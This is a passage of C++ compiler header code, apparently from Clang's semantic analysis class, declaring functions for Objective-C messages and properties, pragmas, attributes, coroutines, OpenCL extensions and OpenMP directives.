QualType BuildObjCTypeParamType(const ObjCTypeParamDecl *Decl,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Build an Objective-C object pointer type.
QualType BuildObjCObjectType(QualType BaseType,
SourceLocation Loc,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<TypeSourceInfo *> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Ensure attributes are consistent with type.
/// \param [in, out] Attributes The attributes to check; they will
/// be modified to be consistent with \p PropertyPtrTy.
void CheckObjCPropertyAttributes(Decl *PropertyPtrTy,
SourceLocation Loc,
unsigned &Attributes,
bool propertyInPrimaryClass);
/// Process the specified property declaration and create decls for the
/// setters and getters as needed.
/// \param property The property declaration being processed
void ProcessPropertyDecl(ObjCPropertyDecl *property);
void DiagnosePropertyMismatch(ObjCPropertyDecl *Property,
ObjCPropertyDecl *SuperProperty,
const IdentifierInfo *Name,
bool OverridingProtocolProperty);
void DiagnoseClassExtensionDupMethods(ObjCCategoryDecl *CAT,
ObjCInterfaceDecl *ID);
Decl *ActOnAtEnd(Scope *S, SourceRange AtEnd,
ArrayRef<Decl *> allMethods = None,
ArrayRef<DeclGroupPtrTy> allTUVars = None);
Decl *ActOnProperty(Scope *S, SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD, ObjCDeclSpec &ODS,
Selector GetterSel, Selector SetterSel,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
Decl *ActOnPropertyImplDecl(Scope *S,
SourceLocation AtLoc,
SourceLocation PropertyLoc,
bool ImplKind,
IdentifierInfo *PropertyId,
IdentifierInfo *PropertyIvar,
SourceLocation PropertyIvarLoc,
ObjCPropertyQueryKind QueryKind);
enum ObjCSpecialMethodKind {
OSMK_None,
OSMK_Alloc,
OSMK_New,
OSMK_Copy,
OSMK_RetainingInit,
OSMK_NonRetainingInit
};
struct ObjCArgInfo {
IdentifierInfo *Name;
SourceLocation NameLoc;
// The Type is null if no type was specified, and the DeclSpec is invalid
// in this case.
ParsedType Type;
ObjCDeclSpec DeclSpec;
/// ArgAttrs - Attribute list for this argument.
ParsedAttributesView ArgAttrs;
};
Decl *ActOnMethodDeclaration(
Scope *S,
SourceLocation BeginLoc, // location of the + or -.
SourceLocation EndLoc, // location of the ; or {.
tok::TokenKind MethodType, ObjCDeclSpec &ReturnQT, ParsedType ReturnType,
ArrayRef<SourceLocation> SelectorLocs, Selector Sel,
// optional arguments. The number of types/arguments is obtained
// from Sel.getNumArgs().
ObjCArgInfo *ArgInfo, DeclaratorChunk::ParamInfo *CParamInfo,
unsigned CNumArgs, // c-style args
const ParsedAttributesView &AttrList, tok::ObjCKeywordKind MethodImplKind,
bool isVariadic, bool MethodDefinition);
ObjCMethodDecl *LookupMethodInQualifiedType(Selector Sel,
const ObjCObjectPointerType *OPT,
bool IsInstance);
ObjCMethodDecl *LookupMethodInObjectType(Selector Sel, QualType Ty,
bool IsInstance);
bool CheckARCMethodDecl(ObjCMethodDecl *method);
bool inferObjCARCLifetime(ValueDecl *decl);
void deduceOpenCLAddressSpace(ValueDecl *decl);
ExprResult
HandleExprPropertyRefExpr(const ObjCObjectPointerType *OPT,
Expr *BaseExpr,
SourceLocation OpLoc,
DeclarationName MemberName,
SourceLocation MemberLoc,
SourceLocation SuperLoc, QualType SuperType,
bool Super);
ExprResult
ActOnClassPropertyRefExpr(IdentifierInfo &receiverName,
IdentifierInfo &propertyName,
SourceLocation receiverNameLoc,
SourceLocation propertyNameLoc);
ObjCMethodDecl *tryCaptureObjCSelf(SourceLocation Loc);
/// Describes the kind of message expression indicated by a message
/// send that starts with an identifier.
enum ObjCMessageKind {
/// The message is sent to 'super'.
ObjCSuperMessage,
/// The message is an instance message.
ObjCInstanceMessage,
/// The message is a class message, and the identifier is a type
/// name.
ObjCClassMessage
};
ObjCMessageKind getObjCMessageKind(Scope *S,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsSuper,
bool HasTrailingDot,
ParsedType &ReceiverType);
ExprResult ActOnSuperMessage(Scope *S, SourceLocation SuperLoc,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildClassMessage(TypeSourceInfo *ReceiverTypeInfo,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildClassMessageImplicit(QualType ReceiverType,
bool isSuperReceiver,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnClassMessage(Scope *S,
ParsedType Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildInstanceMessage(Expr *Receiver,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildInstanceMessageImplicit(Expr *Receiver,
QualType ReceiverType,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnInstanceMessage(Scope *S,
Expr *Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildObjCBridgedCast(SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
TypeSourceInfo *TSInfo,
Expr *SubExpr);
ExprResult ActOnObjCBridgedCast(Scope *S,
SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
ParsedType Type,
SourceLocation RParenLoc,
Expr *SubExpr);
void CheckTollFreeBridgeCast(QualType castType, Expr *castExpr);
void CheckObjCBridgeRelatedCast(QualType castType, Expr *castExpr);
bool CheckTollFreeBridgeStaticCast(QualType castType, Expr *castExpr,
CastKind &Kind);
bool checkObjCBridgeRelatedComponents(SourceLocation Loc,
QualType DestType, QualType SrcType,
ObjCInterfaceDecl *&RelatedClass,
ObjCMethodDecl *&ClassMethod,
ObjCMethodDecl *&InstanceMethod,
TypedefNameDecl *&TDNDecl,
bool CfToNs, bool Diagnose = true);
bool CheckObjCBridgeRelatedConversions(SourceLocation Loc,
QualType DestType, QualType SrcType,
Expr *&SrcExpr, bool Diagnose = true);
bool ConversionToObjCStringLiteralCheck(QualType DstType, Expr *&SrcExpr,
bool Diagnose = true);
bool checkInitMethod(ObjCMethodDecl *method, QualType receiverTypeIfCall);
/// Check whether the given new method is a valid override of the
/// given overridden method, and set any properties that should be inherited.
void CheckObjCMethodOverride(ObjCMethodDecl *NewMethod,
const ObjCMethodDecl *Overridden);
/// Describes the compatibility of a result type with its method.
enum ResultTypeCompatibilityKind {
RTC_Compatible,
RTC_Incompatible,
RTC_Unknown
};
/// Check whether the declared result type of the given Objective-C
/// method declaration is compatible with the method's class.
ResultTypeCompatibilityKind
checkRelatedResultTypeCompatibility(const ObjCMethodDecl *Method,
const ObjCInterfaceDecl *CurrentClass);
void CheckObjCMethodDirectOverrides(ObjCMethodDecl *method,
ObjCMethodDecl *overridden);
void CheckObjCMethodOverrides(ObjCMethodDecl *ObjCMethod,
ObjCInterfaceDecl *CurrentClass,
ResultTypeCompatibilityKind RTC);
enum PragmaOptionsAlignKind {
POAK_Native, // #pragma options align=native
POAK_Natural, // #pragma options align=natural
POAK_Packed, // #pragma options align=packed
POAK_Power, // #pragma options align=power
POAK_Mac68k, // #pragma options align=mac68k
POAK_Reset // #pragma options align=reset
};
/// ActOnPragmaClangSection - Called on well formed \#pragma clang section
void ActOnPragmaClangSection(SourceLocation PragmaLoc,
PragmaClangSectionAction Action,
PragmaClangSectionKind SecKind, StringRef SecName);
/// ActOnPragmaOptionsAlign - Called on well formed \#pragma options align.
void ActOnPragmaOptionsAlign(PragmaOptionsAlignKind Kind,
SourceLocation PragmaLoc);
/// ActOnPragmaPack - Called on well formed \#pragma pack(...).
void ActOnPragmaPack(SourceLocation PragmaLoc, PragmaMsStackAction Action,
StringRef SlotLabel, Expr *Alignment);
enum class PragmaPackDiagnoseKind {
NonDefaultStateAtInclude,
ChangedStateAtExit
};
void DiagnoseNonDefaultPragmaPack(PragmaPackDiagnoseKind Kind,
SourceLocation IncludeLoc);
void DiagnoseUnterminatedPragmaPack();
/// ActOnPragmaMSStruct - Called on well formed \#pragma ms_struct [on|off].
void ActOnPragmaMSStruct(PragmaMSStructKind Kind);
/// ActOnPragmaMSComment - Called on well formed
/// \#pragma comment(kind, "arg").
void ActOnPragmaMSComment(SourceLocation CommentLoc, PragmaMSCommentKind Kind,
StringRef Arg);
/// ActOnPragmaMSPointersToMembers - called on well formed \#pragma
/// pointers_to_members(representation method[, general purpose
/// representation]).
void ActOnPragmaMSPointersToMembers(
LangOptions::PragmaMSPointersToMembersKind Kind,
SourceLocation PragmaLoc);
/// Called on well formed \#pragma vtordisp().
void ActOnPragmaMSVtorDisp(PragmaMsStackAction Action,
SourceLocation PragmaLoc,
MSVtorDispMode Value);
enum PragmaSectionKind {
PSK_DataSeg,
PSK_BSSSeg,
PSK_ConstSeg,
PSK_CodeSeg,
};
bool UnifySection(StringRef SectionName,
int SectionFlags,
DeclaratorDecl *TheDecl);
bool UnifySection(StringRef SectionName,
int SectionFlags,
SourceLocation PragmaSectionLocation);
/// Called on well formed \#pragma bss_seg/data_seg/const_seg/code_seg.
void ActOnPragmaMSSeg(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
StringLiteral *SegmentName,
llvm::StringRef PragmaName);
/// Called on well formed \#pragma section().
void ActOnPragmaMSSection(SourceLocation PragmaLocation,
int SectionFlags, StringLiteral *SegmentName);
/// Called on well-formed \#pragma init_seg().
void ActOnPragmaMSInitSeg(SourceLocation PragmaLocation,
StringLiteral *SegmentName);
/// Called on well-formed \#pragma clang __debug dump II
void ActOnPragmaDump(Scope *S, SourceLocation Loc, IdentifierInfo *II);
/// ActOnPragmaDetectMismatch - Called on well-formed \#pragma detect_mismatch
void ActOnPragmaDetectMismatch(SourceLocation Loc, StringRef Name,
StringRef Value);
/// ActOnPragmaUnused - Called on well-formed '\#pragma unused'.
void ActOnPragmaUnused(const Token &Identifier,
Scope *curScope,
SourceLocation PragmaLoc);
/// ActOnPragmaVisibility - Called on well formed \#pragma GCC visibility... .
void ActOnPragmaVisibility(const IdentifierInfo* VisType,
SourceLocation PragmaLoc);
NamedDecl *DeclClonePragmaWeak(NamedDecl *ND, IdentifierInfo *II,
SourceLocation Loc);
void DeclApplyPragmaWeak(Scope *S, NamedDecl *ND, WeakInfo &W);
/// ActOnPragmaWeakID - Called on well formed \#pragma weak ident.
void ActOnPragmaWeakID(IdentifierInfo* WeakName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc);
/// ActOnPragmaRedefineExtname - Called on well formed
/// \#pragma redefine_extname oldname newname.
void ActOnPragmaRedefineExtname(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaWeakAlias - Called on well formed \#pragma weak ident = ident.
void ActOnPragmaWeakAlias(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaFPContract - Called on well formed
/// \#pragma {STDC,OPENCL} FP_CONTRACT and
/// \#pragma clang fp contract
void ActOnPragmaFPContract(LangOptions::FPContractModeKind FPC);
/// ActOnPragmaFEnvAccess - Called on well formed
/// \#pragma STDC FENV_ACCESS
void ActOnPragmaFEnvAccess(LangOptions::FEnvAccessModeKind FPC);
/// AddAlignmentAttributesForRecord - Adds any needed alignment attributes to
/// the record decl, to handle '\#pragma pack' and '\#pragma options align'.
void AddAlignmentAttributesForRecord(RecordDecl *RD);
/// AddMsStructLayoutForRecord - Adds ms_struct layout attribute to record.
void AddMsStructLayoutForRecord(RecordDecl *RD);
/// FreePackedContext - Deallocate and null out PackContext.
void FreePackedContext();
/// PushNamespaceVisibilityAttr - Note that we've entered a
/// namespace with a visibility attribute.
void PushNamespaceVisibilityAttr(const VisibilityAttr *Attr,
SourceLocation Loc);
/// AddPushedVisibilityAttribute - If '\#pragma GCC visibility' was used,
/// add an appropriate visibility attribute.
void AddPushedVisibilityAttribute(Decl *RD);
/// PopPragmaVisibility - Pop the top element of the visibility stack; used
/// for '\#pragma GCC visibility' and visibility attributes on namespaces.
void PopPragmaVisibility(bool IsNamespaceEnd, SourceLocation EndLoc);
/// FreeVisContext - Deallocate and null out VisContext.
void FreeVisContext();
/// AddCFAuditedAttribute - Check whether we're currently within
/// '\#pragma clang arc_cf_code_audited' and, if so, consider adding
/// the appropriate attribute.
void AddCFAuditedAttribute(Decl *D);
void ActOnPragmaAttributeAttribute(ParsedAttr &Attribute,
SourceLocation PragmaLoc,
attr::ParsedSubjectMatchRuleSet Rules);
void ActOnPragmaAttributeEmptyPush(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Called on well-formed '\#pragma clang attribute pop'.
void ActOnPragmaAttributePop(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Adds the attributes that have been specified using the
/// '\#pragma clang attribute push' directives to the given declaration.
void AddPragmaAttributes(Scope *S, Decl *D);
void DiagnoseUnterminatedPragmaAttribute();
/// Called on well formed \#pragma clang optimize.
void ActOnPragmaOptimize(bool On, SourceLocation PragmaLoc);
/// Get the location for the currently active "\#pragma clang optimize
/// off". If this location is invalid, then the state of the pragma is "on".
SourceLocation getOptimizeOffPragmaLocation() const {
return OptimizeOffPragmaLocation;
}
/// Only called on function definitions; if there is a pragma in scope
/// with the effect of a range-based optnone, consider marking the function
/// with attribute optnone.
void AddRangeBasedOptnone(FunctionDecl *FD);
/// Adds the 'optnone' attribute to the function declaration if there
/// are no conflicts; Loc represents the location causing the 'optnone'
/// attribute to be added (usually because of a pragma).
void AddOptnoneAttributeIfNoConflicts(FunctionDecl *FD, SourceLocation Loc);
/// AddAlignedAttr - Adds an aligned attribute to a particular declaration.
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
bool IsPackExpansion);
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, TypeSourceInfo *T,
bool IsPackExpansion);
/// AddAssumeAlignedAttr - Adds an assume_aligned attribute to a particular
/// declaration.
void AddAssumeAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
Expr *OE);
/// AddAllocAlignAttr - Adds an alloc_align attribute to a particular
/// declaration.
void AddAllocAlignAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *ParamExpr);
/// AddAlignValueAttr - Adds an align_value attribute to a particular
/// declaration.
void AddAlignValueAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E);
/// AddLaunchBoundsAttr - Adds a launch_bounds attribute to a particular
/// declaration.
void AddLaunchBoundsAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *MaxThreads, Expr *MinBlocks);
/// AddModeAttr - Adds a mode attribute to a particular declaration.
void AddModeAttr(Decl *D, const AttributeCommonInfo &CI, IdentifierInfo *Name,
bool InInstantiation = false);
void AddParameterABIAttr(Decl *D, const AttributeCommonInfo &CI,
ParameterABI ABI);
enum class RetainOwnershipKind {NS, CF, OS};
void AddXConsumedAttr(Decl *D, const AttributeCommonInfo &CI,
RetainOwnershipKind K, bool IsTemplateInstantiation);
/// addAMDGPUFlatWorkGroupSizeAttr - Adds an amdgpu_flat_work_group_size
/// attribute to a particular declaration.
void addAMDGPUFlatWorkGroupSizeAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
/// addAMDGPUWavesPerEUAttr - Adds an amdgpu_waves_per_eu attribute to a
/// particular declaration.
void addAMDGPUWavesPerEUAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
bool checkNSReturnsRetainedReturnType(SourceLocation loc, QualType type);
//===--------------------------------------------------------------------===//
// C++ Coroutines TS
//
bool ActOnCoroutineBodyStart(Scope *S, SourceLocation KwLoc,
StringRef Keyword);
ExprResult ActOnCoawaitExpr(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult ActOnCoyieldExpr(Scope *S, SourceLocation KwLoc, Expr *E);
StmtResult ActOnCoreturnStmt(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult BuildResolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
ExprResult BuildUnresolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
UnresolvedLookupExpr* Lookup);
ExprResult BuildCoyieldExpr(SourceLocation KwLoc, Expr *E);
StmtResult BuildCoreturnStmt(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
StmtResult BuildCoroutineBodyStmt(CoroutineBodyStmt::CtorArgs);
bool buildCoroutineParameterMoves(SourceLocation Loc);
VarDecl *buildCoroutinePromise(SourceLocation Loc);
void CheckCompletedCoroutineBody(FunctionDecl *FD, Stmt *&Body);
ClassTemplateDecl *lookupCoroutineTraits(SourceLocation KwLoc,
SourceLocation FuncLoc);
//===--------------------------------------------------------------------===//
// OpenCL extensions.
//
private:
std::string CurrOpenCLExtension;
/// Extensions required by an OpenCL type.
llvm::DenseMap<const Type*, std::set<std::string>> OpenCLTypeExtMap;
/// Extensions required by an OpenCL declaration.
llvm::DenseMap<const Decl*, std::set<std::string>> OpenCLDeclExtMap;
public:
llvm::StringRef getCurrentOpenCLExtension() const {
return CurrOpenCLExtension;
}
/// Check if a function declaration \p FD is associated with any
/// extensions present in OpenCLDeclExtMap and, if so, return the
/// names of those extensions.
std::string getOpenCLExtensionsFromDeclExtMap(FunctionDecl *FD);
/// Check if a function type \p FT is associated with any
/// extensions present in OpenCLTypeExtMap and, if so, return the
/// names of those extensions.
std::string getOpenCLExtensionsFromTypeExtMap(FunctionType *FT);
/// Find an extension in an appropriate extension map and return its name.
template<typename T, typename MapT>
std::string getOpenCLExtensionsFromExtMap(T* FT, MapT &Map);
void setCurrentOpenCLExtension(llvm::StringRef Ext) {
CurrOpenCLExtension = Ext;
}
/// Set OpenCL extensions for a type which can only be used when these
/// OpenCL extensions are enabled. If \p Exts is empty, do nothing.
/// \param Exts A space separated list of OpenCL extensions.
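///
/// A hedged example (\c cl_khr_fp64 is a real OpenCL extension name; \c T
/// is illustrative):
/// \code
///   setOpenCLExtensionForType(T, "cl_khr_fp64"); // T usable only with fp64
/// \endcode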
void setOpenCLExtensionForType(QualType T, llvm::StringRef Exts);
/// Set OpenCL extensions for a declaration which can only be
/// used when these OpenCL extensions are enabled. If \p Exts is empty, do
/// nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForDecl(Decl *FD, llvm::StringRef Exts);
/// Set current OpenCL extensions for a type which can only be used
/// when these OpenCL extensions are enabled. If current OpenCL extension is
/// empty, do nothing.
void setCurrentOpenCLExtensionForType(QualType T);
/// Set current OpenCL extensions for a declaration which
/// can only be used when these OpenCL extensions are enabled. If current
/// OpenCL extension is empty, do nothing.
void setCurrentOpenCLExtensionForDecl(Decl *FD);
bool isOpenCLDisabledDecl(Decl *FD);
/// Check if type \p T corresponding to declaration specifier \p DS
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledTypeDeclSpec(const DeclSpec &DS, QualType T);
/// Check if declaration \p D used by expression \p E
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledDecl(const NamedDecl &D, const Expr &E);
//===--------------------------------------------------------------------===//
// OpenMP directives and clauses.
//
private:
void *VarDataSharingAttributesStack;
/// Number of nested '#pragma omp declare target' directives.
unsigned DeclareTargetNestingLevel = 0;
/// Initialization of data-sharing attributes stack.
void InitDataSharingAttributesStack();
void DestroyDataSharingAttributesStack();
ExprResult
VerifyPositiveIntegerConstantInClause(Expr *Op, OpenMPClauseKind CKind,
bool StrictlyPositive = true);
/// Returns OpenMP nesting level for current directive.
unsigned getOpenMPNestingLevel() const;
/// Adjusts the function scopes index for the target-based regions.
void adjustOpenMPTargetScopeIndex(unsigned &FunctionScopesIndex,
unsigned Level) const;
/// Returns the number of scopes associated with the construct on the given
/// OpenMP level.
int getNumberOfConstructScopes(unsigned Level) const;
/// Push new OpenMP function region for non-capturing function.
void pushOpenMPFunctionRegion();
/// Pop OpenMP function region for non-capturing function.
void popOpenMPFunctionRegion(const sema::FunctionScopeInfo *OldFSI);
/// Check whether we're allowed to call Callee from the current function.
void checkOpenMPDeviceFunction(SourceLocation Loc, FunctionDecl *Callee,
bool CheckForDelayedContext = true);
/// Check whether we're allowed to call Callee from the current function.
void checkOpenMPHostFunction(SourceLocation Loc, FunctionDecl *Callee,
bool CheckCaller = true);
/// Check if the expression is allowed to be used in expressions for the
/// OpenMP devices.
void checkOpenMPDeviceExpr(const Expr *E);
/// Finishes analysis of the deferred function calls that may be declared as
/// host/nohost during device/host compilation.
void finalizeOpenMPDelayedAnalysis();
/// Checks if a type or a declaration is disabled due to the owning extension
/// being disabled, and emits diagnostic messages if it is disabled.
/// \param D type or declaration to be checked.
/// \param DiagLoc source location for the diagnostic message.
/// \param DiagInfo information to be emitted for the diagnostic message.
/// \param SrcRange source range of the declaration.
/// \param Map maps type or declaration to the extensions.
/// \param Selector selects diagnostic message: 0 for type and 1 for
/// declaration.
/// \return true if the type or declaration is disabled.
template <typename T, typename DiagLocT, typename DiagInfoT, typename MapT>
bool checkOpenCLDisabledTypeOrDecl(T D, DiagLocT DiagLoc, DiagInfoT DiagInfo,
MapT &Map, unsigned Selector = 0,
SourceRange SrcRange = SourceRange());
/// Marks all the functions that might be required for the currently active
/// OpenMP context.
void markOpenMPDeclareVariantFuncsReferenced(SourceLocation Loc,
FunctionDecl *Func,
bool MightBeOdrUse);
public:
/// Types used to store the context selector info for the declare variant
/// directive.
using OMPCtxStringType = SmallString<8>;
using OMPCtxSelectorData =
OpenMPCtxSelectorData<SmallVector<OMPCtxStringType, 4>, ExprResult>;
/// Checks if the variant/multiversion functions are compatible.
bool areMultiversionVariantFunctionsCompatible(
const FunctionDecl *OldFD, const FunctionDecl *NewFD,
const PartialDiagnostic &NoProtoDiagID,
const PartialDiagnosticAt &NoteCausedDiagIDAt,
const PartialDiagnosticAt &NoSupportDiagIDAt,
const PartialDiagnosticAt &DiffDiagIDAt, bool TemplatesSupported,
bool ConstexprSupported, bool CLinkageMayDiffer);
/// Attempts to capture a lambda's captured variables in the OpenMP region
/// before the lambda itself is captured.
void tryCaptureOpenMPLambdas(ValueDecl *V);
/// Return true if the provided declaration \a D should be captured by
/// reference.
/// \param Level Relative level of nested OpenMP construct for which the check
/// is performed.
/// \param OpenMPCaptureLevel Capture level within an OpenMP construct.
bool isOpenMPCapturedByRef(const ValueDecl *D, unsigned Level,
unsigned OpenMPCaptureLevel) const;
/// Check if the specified variable is used in one of the private
/// clauses (private, firstprivate, lastprivate, reduction etc.) in OpenMP
/// constructs.
VarDecl *isOpenMPCapturedDecl(ValueDecl *D, bool CheckScopeInfo = false,
unsigned StopAt = 0);
ExprResult getOpenMPCapturedExpr(VarDecl *Capture, ExprValueKind VK,
ExprObjectKind OK, SourceLocation Loc);
/// If the current region is a loop-based region, mark the start of the loop
/// construct.
void startOpenMPLoop();
/// If the current region is a range loop-based region, mark the start of the
/// loop construct.
void startOpenMPCXXRangeFor();
/// Check if the specified variable is used in 'private' clause.
/// \param Level Relative level of nested OpenMP construct for which the check
/// is performed.
bool isOpenMPPrivateDecl(const ValueDecl *D, unsigned Level) const;
/// Sets OpenMP capture kind (OMPC_private, OMPC_firstprivate, OMPC_map etc.)
/// for \p FD based on DSA for the provided corresponding captured declaration
/// \p D.
void setOpenMPCaptureKind(FieldDecl *FD, const ValueDecl *D, unsigned Level);
/// Check if the specified variable is captured by 'target' directive.
/// \param Level Relative level of nested OpenMP construct for which the check
/// is performed.
bool isOpenMPTargetCapturedDecl(const ValueDecl *D, unsigned Level) const;
ExprResult PerformOpenMPImplicitIntegerConversion(SourceLocation OpLoc,
Expr *Op);
/// Called on start of new data sharing attribute block.
void StartOpenMPDSABlock(OpenMPDirectiveKind K,
const DeclarationNameInfo &DirName, Scope *CurScope,
SourceLocation Loc);
/// Start analysis of clauses.
void StartOpenMPClause(OpenMPClauseKind K);
/// End analysis of clauses.
void EndOpenMPClause();
/// Called on end of data sharing attribute block.
void EndOpenMPDSABlock(Stmt *CurDirective);
/// Check if the current region is an OpenMP loop region and if it is,
/// mark loop control variable, used in \p Init for loop initialization, as
/// private by default.
/// \param Init First part of the for loop.
void ActOnOpenMPLoopInitialization(SourceLocation ForLoc, Stmt *Init);
// OpenMP directives and clauses.
/// Called on correct id-expression from the '#pragma omp
/// threadprivate'.
ExprResult ActOnOpenMPIdExpression(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
OpenMPDirectiveKind Kind);
/// Called on well-formed '#pragma omp threadprivate'.
DeclGroupPtrTy ActOnOpenMPThreadprivateDirective(
SourceLocation Loc,
ArrayRef<Expr *> VarList);
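// For illustration, a sketch (standard OpenMP syntax) of the directive this
// callback handles:
//
//   static int counter;
//   #pragma omp threadprivate(counter)  // one copy of 'counter' per thread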
/// Builds a new OpenMPThreadPrivateDecl and checks its correctness.
OMPThreadPrivateDecl *CheckOMPThreadPrivateDecl(SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Called on well-formed '#pragma omp allocate'.
DeclGroupPtrTy ActOnOpenMPAllocateDirective(SourceLocation Loc,
ArrayRef<Expr *> VarList,
ArrayRef<OMPClause *> Clauses,
DeclContext *Owner = nullptr);
/// Called on well-formed '#pragma omp requires'.
DeclGroupPtrTy ActOnOpenMPRequiresDirective(SourceLocation Loc,
ArrayRef<OMPClause *> ClauseList);
/// Check restrictions on the 'requires' directive.
OMPRequiresDecl *CheckOMPRequiresDecl(SourceLocation Loc,
ArrayRef<OMPClause *> Clauses);
/// Check if the specified type is allowed to be used in 'omp declare
/// reduction' construct.
QualType ActOnOpenMPDeclareReductionType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name,
ArrayRef<std::pair<QualType, SourceLocation>> ReductionTypes,
AccessSpecifier AS, Decl *PrevDeclInScope = nullptr);
/// Initialize declare reduction construct combiner.
void ActOnOpenMPDeclareReductionCombinerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct combiner.
void ActOnOpenMPDeclareReductionCombinerEnd(Decl *D, Expr *Combiner);
/// Initialize declare reduction construct initializer.
/// \return omp_priv variable.
VarDecl *ActOnOpenMPDeclareReductionInitializerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionInitializerEnd(Decl *D, Expr *Initializer,
VarDecl *OmpPrivParm);
/// Called at the end of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveEnd(
Scope *S, DeclGroupPtrTy DeclReductions, bool IsValid);
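// For illustration, a sketch (OpenMP 4.0 syntax; 'myadd' is a made-up name)
// of the construct the declare-reduction callbacks above parse:
//
//   #pragma omp declare reduction(myadd : int : omp_out += omp_in) initializer(omp_priv = 0)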
/// Check variable declaration in 'omp declare mapper' construct.
TypeResult ActOnOpenMPDeclareMapperVarDecl(Scope *S, Declarator &D);
/// Check if the specified type is allowed to be used in 'omp declare
/// mapper' construct.
QualType ActOnOpenMPDeclareMapperType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare mapper'.
OMPDeclareMapperDecl *ActOnOpenMPDeclareMapperDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name, QualType MapperType,
SourceLocation StartLoc, DeclarationName VN, AccessSpecifier AS,
Decl *PrevDeclInScope = nullptr);
/// Build the mapper variable of '#pragma omp declare mapper'.
void ActOnOpenMPDeclareMapperDirectiveVarDecl(OMPDeclareMapperDecl *DMD,
Scope *S, QualType MapperType,
SourceLocation StartLoc,
DeclarationName VN);
/// Called at the end of '#pragma omp declare mapper'.
DeclGroupPtrTy
ActOnOpenMPDeclareMapperDirectiveEnd(OMPDeclareMapperDecl *D, Scope *S,
ArrayRef<OMPClause *> ClauseList);
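// For illustration, a sketch (OpenMP 5.0 syntax; 'vec' and its members are
// made-up names) of the construct the declare-mapper callbacks above parse:
//
//   struct vec { int len; double *data; };
//   #pragma omp declare mapper(id : struct vec v) map(v.len, v.data[0:v.len])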
/// Called on the start of target region, i.e. '#pragma omp declare target'.
bool ActOnStartOpenMPDeclareTargetDirective(SourceLocation Loc);
/// Called at the end of target region, i.e. '#pragma omp end declare target'.
void ActOnFinishOpenMPDeclareTargetDirective();
/// Searches for the provided declaration name for OpenMP declare target
/// directive.
NamedDecl *
lookupOpenMPDeclareTargetName(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
